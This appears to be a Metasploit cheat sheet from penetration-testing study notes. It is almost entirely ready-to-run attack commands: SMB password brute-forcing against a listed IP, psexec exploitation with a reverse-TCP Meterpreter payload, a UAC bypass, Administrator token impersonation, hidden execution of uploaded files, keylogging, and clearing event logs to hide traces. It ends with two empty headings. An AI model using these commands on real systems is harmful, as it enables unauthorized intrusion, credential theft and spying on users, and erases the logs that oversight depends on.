METASPLOIT

  • GENERAL USE
  • HOST DISCOVERY
  • SMB BRUTE FORCE
  • SMB ENUMERATION
  • METERPRETER

General Use:

search cve:"Number"                       | search for modules by CVE number


info [path_to_exploit]                    | show information about the exploit


grep nameOFservice search type:exploit    | Ex: grep vnc search type:exploit


search exploit/linux/local                | list local Linux exploit modules


search exploit/windows/local              | list local Windows exploit modules

Host Discovery:

run autoroute -s [net block]              | add a route through the current session

background 

use auxiliary/scanner/portscan/tcp

set RHOSTS [netblock]

set THREADS 10

set PORTS portNumbers

run

SMB Brute Force: user/password lists

use auxiliary/scanner/smb/smb_login

set PASS_FILE /usr/share/seclists/Passwords/best15.txt

set USER_FILE /usr/share/seclists/Usernames/top_shortlist.txt

set RHOSTS 10.130.40.70

run

SMB Exploit:

use exploit/windows/smb/psexec   | credentials known, psexec module

set SMBPass password

set SMBUser administrator

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [Local_machine_IP]

exploit

SMB Enumeration

use auxiliary/scanner/smb/smb_enumshares

set RHOSTS [IP address]

run

sessions -i 1

shell

net use K: \\IP_ADDRESS\FILESHARE        | map the share as drive K: from the target's shell

download [path]                           | download files to the local machine (Meterpreter command, not the shell)

UAC Bypass Module:

use exploit/windows/local/bypassuac       | use the bypassuac module for privilege escalation

show options

exploit

NULL SESSION

sessions -i 1 

shell

whoami

use incognito                              | load the incognito extension

list_tokens -u

impersonate_token DOMAIN\\Administrator     | Ex: impersonate_token els-Win7\\Administrator

Meterpreter Commands:

sysinfo                                | system information


download [path]                        | Ex: download C:\\Users\\Desktop\\Files.txt


upload  [FileNAME] [Target path]       | Ex: upload click.exe C:\\Users\\Desktop


execute -f fileName.exe -i -H          | execute on the target machine (interactive, hidden window)


search -f fileName                     | Ex: search -f secret.*


run post/[module]                        | run Meterpreter post-exploitation modules

Meterpreter Post Exploitation:

run post/windows/gather                  | information-gathering modules (tab-complete to list them)


run post/windows/gather/enum_applications | lists the installed applications


run post/windows/gather/enum_services     | lists the installed services


run post/windows/gather/win_privs         | shows current privileges and whether User Account Control [UAC] is enabled


run post/linux/gather/enum_system         | enumerate Linux system information after exploitation


ps                                         | lists running processes


getpid                                     | shows the PID of the current process


run post/windows/manage/migrate            | migrates the session to a new notepad.exe process


migrate pidNumber                          | migrate to a specific process


keyscan_start                              | start the keylogger


keyscan_dump                               | show keylogged characters


keyscan_stop                               | stop the keylogger


clearev                                    | clear the event logs to cover the traces


getsystem                                  | privilege escalation on older Windows systems

Meterpreter with Incognito Extension:

use incognito                                | incognito helps impersonate other users' tokens, including the admin


list_tokens -u


impersonate_token tokenName                  | Ex: impersonate_token user\\administrator

Linux Post Exploitation:



Privilege Escalation [Windows]


